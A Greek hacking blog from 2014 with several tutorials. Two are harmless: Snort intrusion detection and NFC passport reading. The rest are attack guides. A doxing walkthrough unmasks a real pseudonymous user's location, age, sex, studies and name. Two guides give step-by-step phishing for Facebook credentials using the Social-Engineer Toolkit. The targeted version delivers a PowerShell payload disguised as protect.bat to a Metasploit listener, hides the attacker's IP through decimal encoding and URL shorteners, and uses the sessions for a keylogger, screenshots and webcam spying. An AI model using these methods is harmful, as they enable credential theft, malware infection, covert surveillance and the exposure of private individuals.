ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Δευτέρα 17 Νοεμβρίου 2014

Πως εντοπιζουμε καποιον στο διαδικτυο (Doxing & Digging)






Τι θα χρειαστειτε;

1.Windows η kali linux
2.Μυαλo




Με τον ορο Doxing και Digging εννοουμε την συλλογη διαφορων πληροφοριων απο το internet ωστε να φτασουμε σε ενα φυσικο προσωπο

Να γνωριζετε οτι δημοσιευση στο διαδικτυο κανετε μενει για παντα
και ετσι αφηνει ιχνη στο να σας βρουνε
Ποιο πολλοι χρηστες του διαδικτυου εχουνε φτιαξει ενα ψευδωνυμο στην αρχη και το χρησιμοποιουνε συνεχεια για να καταλαβετε τι εννοω θα προσπαθησω να βρω εναν απο αυτα τα παιδια που κανουν τις μεταφρασεις

Τυχαια επιλεγω την Zombarxina

οποτε για αρχη αναζητω Zombarxina στο google βλεπω διαφορα και τα ανοιγω για να βρω πληροφοριες πχ


Aνοιγω το πρωτο link και βλεπω οτι σπουδαζει Γεωπονικη στην Θεσσαλονικη


κανω εγγραφη στο LinkedIn για να δω ολοκληρο το προφιλ μηπως εχει καμια αλλη πληροφορια

δυστυχως δεν ειδα κατι παρα μονο οτι εχει γνωσεις microsoft office


πηγαινω στην δευτερη σελιδα και ανοιγω

πηγαινω να δω τα μελη στο forum και μου ζηταει να γραφτω γραφομαι στο forum και ψαχνω για το ονομα zombarxina και δεν βρισκω τιποτα

γιατι ομως το google μου εβγαλε αυτη την σελιδα ?πολυ απλα γιατι υπαρχει αυτο το ονομα στο forum απλα η εχει αλλαξει τις ρυθμισεις της να μην γινεται αναζητηση απο αλλους η το εχει διαγραψει

οποτε εγω επιλεγω στο link προσωρινη αποθηκευση



η προσωρινη αποθηκευση ειναι μια ιδιοτητα που αποθηκευει προσωρινα ενα στιγμιοτυπο της σελιδα η google

και ξαφνιαστηκα οταν ειδα οτι η zombarxina δεν ειναι κοπελα αλλα αντρας
ηλικιας 22 χρονων


 δειτε εδω


οποτε μεχρι στιγμης εχω βρει

Τοποθεσια:Θεσσαλονικη
Ηλικια:22
Φυλο:Αντρας
Σπουδες:Γεωπονικη
φωτογραφια

και συνεχιζω στο επομενο link το οποιο με εβγαλε σε μια σελιδα με ονοματα μωρων


Αναρωτιεμαι γιατι ενας αντρας εχει διαλεξει γυναικιο ονομα για ανωνυμια?
πολυ απλα οπως βλεπετε στην πανω εικονα anixrabmoz ειναι το zombarxina αναποδα οποτε το ονομα ειναι xaramboz (χαραλαμπος) για να το καταλαβετε ειναι οπως η φραση "τα λεμε" την λεμε στην αργω "ταμελε" καπως ετσι λογικα θα το σκεφτηκε το ψευδωνυμο

και για να διαπιστωσω οτι ειμαι σε καλα χναρια να μια αλλη αποδειξη οτι οντως ειναι αντρας σε ενα link με webradio βρηκα αυτο


μια κοπελα δεν θα ελεγε ποτε στο διαδικτυο
"ας πουμε καμια μαλακια να περασει η ωρα"

οποτε τωρα κανω μια αναζητηση πχ xaralambos greek subs


και βλεπω διαφορα link που συσχετιζουνε με αυτο το ονομα και το greek subs

οποτε επιλεγω το πρωτο link και μου εμφανιζει καποιον χαραλαμπο ηλικιας 40-45 προφανως δεν ειναι αυτος

στο δευτερο link μου βγαζει εναν πιο μικρης ηλικιας


βλεπω οτι στο καναλι του εχει και αλλες ταινιες και οτι ειναι συνδεδεμενο με το facebook οποτε επιλεγω στο link του facebook



και κοιταω στις πληροφοριες του


και τωρα συνδεετε τελειως η τοποθεσια και το anixrabmoz δλδ ειναι το xaralamboz συν ενα αλλο ονομα το οποιο δεν αποκαλυπτω

βεβαια παρολο που βρηκα ολα αυτα το μονο που μενει ειναι να εξακριβωσω ηλικια και αν σπουδαζει στην γεωπονικη

και ετσι γινεται το Doxing & Digging

Κυριακή 16 Νοεμβρίου 2014

Πως βλεπουμε αν καποιος κανει επιθεση στην ιστοσελιδα η στο δικτυο μας






Τι θα χρειαστειτε;

1.Kali linux
2.Snort

Το Snort ειναι ενα προγραμμα το οποιο σας επιτρεπει να ανιχνευσετε  διαφορες επιθεσεις που γινονται στο δικτυο σας

Ανοιγουμε ενα τερματικο και γραφουμε apt-get install snort


επιλεγουμε Y

μετα βαζουμε το ευρος των ip που εχει το δικτυο μας πχ 192.168.1.0/24
και επιλεγουμε ok


οταν τελειωσει η εγκατασταση

γραφουμε σε ενα τερματικο

snort -i wlan0 -l /var/log/snort/ -c /etc/snort/snort.conf

αυτη η εντολη τρεχει ολους τους κανονες του snort

για να δουμε αν καποιος προσπαθει να μας επιτεθει γραφουμε σε ενα αλλο τερματικο

tail -f /var/log/snort/alert

και βλεπουμε τα αποτελεσματα πχ εγω τυχαια επιασα εναν και με γλυτωσε απο την αναπαρασταση για αυτο τον οδηγο 
συγκεκριμενα κατω βλεπετε οτι προσπαθει  με splice attack να παρακαμψει το IDS και το firewall ωστε να επιτεθει



η οποια ip ειναι απο ουκρανια


και αυτη η ip ειναι απο Ελλαδα και συγκεκριμενα ψαχνει για  την υπηρεσια SNMP


και εδω βλεπουμε οτι κανει DOS attack


οπως βλεπετε το Snort θα σας εμφανισει σε πραγματικο χρονο τις επιθεσεις που δεχεται το δικτυο σας
η βασικη χρηση του Snort ειναι αυτη

για οσους τρεχουν ιστοσελιδες και διαφορες υπηρεσιες μπορουν να κοιταξουν εδω ωστε να φτιαξουνε αναλογα τους κανονες του Snort



Σάββατο 15 Νοεμβρίου 2014

Πως κοιταμε αν ενα διαβατηριο ειναι πλαστο με το κινητο μας (NFC)




Τι θα χρειαστειτε;

1.Ενα κινητο Android με NFC


Το NFC (Near Field Communication)  ειναι μια ασυρματη επικοινωνια  παρα πολυ μικρης εμβελειας (1-4 εκατοστων στα κινητα)  βρισκετε συνηθως στο πισω μερος του κινητου σας (στο καπακι ενα μαυρο πλακε πραγμα).Με το NFC μπορειτε να διαβασετε διαφορες ετικετες NFC

Το 2010 αν θυμαστε καλα αλλαξαμε ολοι τα παλια διαβατηρια μας και οι περισσοτεροι βγαλανε μια και 2 φορες φωτογραφιες ωστε να γινουνε δεκτες απο τις αρχες γιατι ομως?

Πολυ απλα για να μεταφερουν ψηφιακα τα στοιχεια στα διαβατηρια τα οποια εχουνε ετικετα NFC

Πηγαινουμε στο google play και κατεβαζουμε την εφαρμογη NFC passport reader


οταν εχουμε κανει εγκατασταση της εφαρμογης τοτε ενεργοποιουμε το NFC βλεπετε στην πανω εικονα το εικονιδιο που λεει NFC

 ας δουμε τα στοιχεια  ενος διαβατηριου


οπως βλεπετε με το ματι μπορει να δειτε οτι η ημερομηνια γεννησης ειναι και κατω με αντιστροφη σειρα συν το φυλο συν η ημερομηνια ληξης
ετσι κοιτουσανε παλια αν ενα διαβατηριο ειναι πλαστο συν την ποιοτητα του διαβατηριου ,φωτογραφια κτλ

Βεβαια αυτα τα στοιχεια καποιος που γνωριζει απο εκτυπωσεις μπορει ευκολα να τα κανει να φενονται αληθινα το οποιο και κανανε πριν το 2010

τωρα ανοιγουμε την εφαρμογη NFC Passport reader και βαζουμε πανω στο διαβατηριο το κινητο μας
η ετικετα NFC βρισκετε στο πισω μερος του διαβατηριου. 

το κινητο μας θα διαβασει την ετικετα NFC του διαβατηριου και θα μας βγαλει τα στοιχεια
εδω βλεπετε την φωτογραφια


 και τα υπολοιπα στοιχεια


οπως βλεπετε αν καποιο στοιχειο δεν συμφωνει με την εκτυπωση τοτε το διαβατηριο ειναι πλαστο
Το συγκεκριμενο διαβατηριο δεν ειναι οπως βλεπετε

Με αυτο τον τροπο οι Ελληνικες αρχες καταφερανε να περιορισουνε τα πλαστα διαβατηρια.
Αν κοιταξετε στην εφαρμογη NFC Passport Reader στο Security θα δειτε το ψηφιακο πιστοποιητικο δλδ απο ποιον γραφτηκε και ποιος πιστοποιει  την NFC ετικετα επισης θα δειτε οτι το πιστοποιητικο ειναι απο 06/08/2010 και ληγει στις 5/11/2015

Σάββατο 8 Νοεμβρίου 2014

Πως κλεβουμε κωδικους Facebook ( Iframe Phishing Technique)





Τι θα χρειαστειτε;

1.Kali Linux
2.Αρχειο index.html

Κατεβαζουμε το αρχειο απο εδω

Επιλεγουμε την σελιδα που θελουμε να παρουσιασουμε στο θυμα
πχ εγω επελεξα την www.break.com η οποια εχει βιντεο εσεις μπορειτε να διαλεξετε οποια σελιδα θελετε
ανοιγουμε με leafpad το αρχειο index.html
και αλλαζουμε

τον τιτλο

 την σελιδα


Σημαντικο εδω αλλαζετε και βαζετε την δικια σας εξωτερικη ip

τωρα γραφουμε σε ενα τερματικο setoolkit
επιλεγουμε 1  

 επιλεγουμε 2
 
  επιλεγουμε 3

 επιλεγουμε 3

γραφουμε την εξωτερικη μας ip εγω εγραψα την εσωτερικη μου
μετα γραφουμε που εχουμε το αρχειο index.html που κατεβασαμε
εγω το εβαλα στο φακελο /root/tools/Phising/
εσεις λογικα θα το εχετε /root/downloads/
μετα βαζετε την url της σελιδας εγω εβαλα www.break.com


 και το SET μας εφτιαξε την ψευτικη σελιδα

 κλεινουμε το τερματικο

*μην ξεχασετε να κανετε προωθησει της θυρας 80 στο router σας κοιταχτε παλιοτερο οδηγο*

Τωρα ειμαστε ετοιμοι να στειλουμε το link στο θυμα πχ
Δειτε  δειγμα κοινωνικης μηχανικης


*εννοειτε οτι δεν στελνουμε γυμνη την εξωτερικη μας ip δλδ http://192.168.1.4
στο θυμα παρα μονο με καποια υπηρεσια url shortener*

οταν το θυμα μας τελειωσει απο το τηγανισμα θα πατησει στο link και θα του εμφανιστει αυτη η σελιδα


οταν πληκτρολογισει τα κρητηρια συνδεσης του τοτε θα παει κανονικα στην σελιδα και θα δει το βιντεο


εσεις ανοιγετε ενα τερματικο και γραφετε

tail -f /var/www/harvester*.txt

και θα σας εμφανιστουν τα κρητηρια συνδεσης του θυματος


Aυτος ο οδηγος υπαρχει στο "Βιβλιο της Αγαπης" οποιoς ενδιαφερετε να κανει προχωρημενες διαφορες  επιθεσεις καθαρα στο  facebook ας κοιταξει εδω

Δευτέρα 3 Νοεμβρίου 2014

Πως κλεβουμε κωδικους facebook απο στοχευμενο χρηστη (Advance Phishing and Ιnfection)


Τι θα χρειαστειτε;

1.Kali linux


Γραφουμε σε ενα τερματικο

curl ifconfig.me

αυτη θα ειναι η εξωτερικη σας ip σημειωστε την
εγω στον οδηγο θα χρησιμοποιηω την εσωτερικη μου ip 192.168.1.4 εσεις θα βαζετε την εξωτερικη σας οπου βλεπετε 192.168.1.4

τωρα πηγαινουμε στο προφιλ του θυματος πχ


παταμε ctrl+u ,επιλεγουμε μεσα τον κωδικα παταμε ctrl+a ωστε να τα επιλεξουμε ολα και ctrl+c για να κανουμε αντιγραφη

δημιουργουμε ενα αρχειο index.html στην επιφανεια εργασιας



το ανοιγουμε με leafpad και με ctrl+v κανουμε επικοληση η με δεξι κλικ και paste

 παταμε ctrl+Η και γραφουμε Εγγραφή  και απο κατω Αναφορά

μετα παταμε ctrl+f και γραφουμε Aναφορά

αλλαζουμε ολο το href "περιεχομενο""με href "http://192.168.1.4/report.html"


πχ


το ξαναλεω εσεις θα βαλετε πχ http"//exoterikhip/report.html

παταμε παλι ctrl+f και γραφουμε action=https

και κανουμε την αντικατασταση με http://192.168.1.4/post.php


μετα παλι παταμε με ctrl+F και ψαχνουμε για /login.php?next=https

και κανουμε την αντικατασταση πριν το ? δλδ http"//192.168.1.4/login.html



παταμε παλι ctr+h και γραφουμε το ονομα του θυματος οπως το εμφανιζει η σελιδα πχ εμενα ειναι Koula Gourdoumpouli

και απο κατω σε οτι πιστευετε οτι μπορει να ενοχλησει το θυμα


επιλεγουμε Find and Replace

τελος παταμε ctrl+f και γραφουμε να μας βρει "Για να συνδεθείτε" χωρις τα ""

και το αλαλζουμε σε "Κάντε αναφορά η συνθεθείτε στο facebook"



αποθηκευουμε το αρχειο index.html

οταν το ανοιξουμε θα μας το ανοιξει με το iceweasel και θα μας εμφανισει αυτο



μετα γραφουμε σε ενα τερματικο

setoolkit

επιλεγουμε 1
επιλεγουμε 2
επιλεγουμε 3


επιλεγουμε 2
 βαζουμε την εξωτερικη μας ip


γραφουμε https://www.facebook.com

 και το SET μας εφτιαξε την ψευτικη σελιδα του facebook


τωρα παταμε enter και επιλεγουμε 99

μετα επιλεγουμε 9


 επιλεγουμε 1

γραφουμε την ip μας και την θυρα που θελουμε να ακουει ο ιος μας
πχ 192.168.1.4 και θυρα 7777 μετα επιλεγουμε yes
το metasploit τωρα θα περιμενει για να τρεξει το θυμα το κακοβουλο αρχειο

  η αν θελουμε  το armitage επιλεγουμε no, κλεινουμε  το τερματικο και ξεκιναμε το armitage  δειτε παλιοτερο οδηγο

τωρα μας μενει να μεταφερουμε τον ιο στο /var/www με την εντολη

 mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/

πηγαινουμε στο /var/www και εκει
ονομαζουμε το index.html που μας δημιουργησε το SET σε login.html
μετα ονομαζουμε το x86_powershell_injection.txt σε protect.bat
μετα κατεβαζουμε αυτα τα αρχεια εδω

τα κανουμε extract

και τα μεταφερουμε στο /var/www

πηγαινουμε στο /var/www και εκει μεταφερουμε το index.html το οποιο φτιαξαμε απο το προφιλ του θυματος

οποτε στο /var/www/ πρεπει να εχουμε τα εξεις αρχεια
index.html - αυτο που φτιαξαμε απο το προφιλ του θυματος
login.html - αυτο που μας εφτιαξε το SET και το ονομασαμε ετσι
post.php το εφτιαξε το SET
harvester.txt τo εφτιαξε το SET
report_html -τον φακελο που καταβασατε
report.html τον αρχειο που κατεβασατε
protect.bat ο ιος που φτιαξαμε με το SET

τωρα ανοιγουμε το αρχειο report.html με leafpad
παταμε ctrl+h και βαζουμε πανω 192.168.1.4 και απο κατω να γινει
αντικατασταση με την εξωτερικη σας ip


 επιλεγουμε Find and Replace και αποθηκευουμε

τωρα ειμαστε ετοιμοι να κανουμε την επιθεση μας

*προσοχη πρεπει να προωθησετε την θυρα 80 και την θυρα 7777 στο ρουτερ σας η να επιλεξετε dmz ετσι ωστε να μπορει να ενωθει το θυμα με εσας και να μην τον εμποδιζει το firewall του ρουτερ σας
κοιταξτε παλιοτερους οδηγους

τωρα το μονο που μενει ειναι να κρυψετε την εξωτερικη σας ip πχ

στο θυμα μας θα στειλουμε http://192.168.1.4 και  θα πουμε οτι της εχουνε φτιαξει ψευτικο προφιλ εδω πεζει σημαντικο ρολος η κοινωνικη μηχανικη

ομως το http://192.168.1.4 ειναι υποπτο γιατι ειναι μια ip

οποτε θα μετατρεψουμε την ip μας σε δεκαδικη

πολλαπλασιαζουμε και προσθετουμε οπως κατω πχ
την ip 192.168.1.4

192 * 256 + 168 = * 256 + 1 = * 256 + 4 =3232235780
 
οποτε 192.168.1.4 ειναι το ιδιο με 3232235780
 
και 3232235780/?www.facebook.com οτι βαλουμε μετα το /? δεν ισχυει
και θα γινει http://3232235780/?www.facebook.com

η μπορουμε να χρησιμοποιησουμε ενα online url shortener πατηστε εδω

οταν πατησει το θυμα θα του εμφανιστει αυτο


 αν βαλει τα κριτηρια συνδεσεις του  απο πανω τοτε θα σας ερθουνε
αν πατησει Συνδεση τοτε θα τον ανακατεθυνει στο login.html που παλι αν βαλει τα κρητηρια συνδεσης του τοτε θα σας ερθουνε


αν πατησει αναφορα τοτε θα του εμφανισει αυτη την σελιδα η οποια αν ακολουθησει τα βηματα θα κατεβασει τον ιο και θα μας ανοιξει μια συνεδρια με το θυμα μας

 Για να δουμε τους κωδικους γραφουμε σε ενα τερματικο

tail -f /var/www/harvester*.txt


και οταν το θυμα τρεξει το αρχειο θα μας ανοιξει μια συνεδρια δειτε κατω με το metasploit


παταμε enter και γραφουμε sessions -v


για να επιδρασουμε με καποια συνεδρια γραφουμε sessions -i 1


και οπως βλεπετε με την εντολη screenshot πηρα ληψη της επιφανειας εργασιας του θυματος

ποιο βολικο ομως ειναι το armitage που ειναι η γραφικη μορφη του metasploit πχ κατω βλεπετε το θυμα και την εικονα της επιφανειας εργασιας του

 απο εκει και περα μπορειτε να παρετε οχι μονο κωδικους facebook αλλα και οτι κωδικους εχει αποθηκευσει το θυμα στο browser του

πχ τωρα τρεχω keylogger και οτι πληκτρολογει το θυμα μου εμφανιζετε


Τα antivirus δεν βρισκουνε τιποτα με αυτη την μεθοδο οποτε εχετε τον πληρη ελενχο στο θυμα ακομα και σε καμερα και μικροφωνο πχ ας δουμε την καμερα του θυματος


Προσοχη για να μην χασετε την συνεδρια πρεπει να εχετε κανει persist στο θυμα κοιταξτε παλιοτερο οδηγο με veil
και επισης να ξερετε αν ανοιξετε την καμερα στο θυμα θα το καταλαβει απο το λαμπακι

Αυτος ο οδηγος ειναι ενας απο τους πολλους που εχει "Το Βιβλιο της Αγαπης"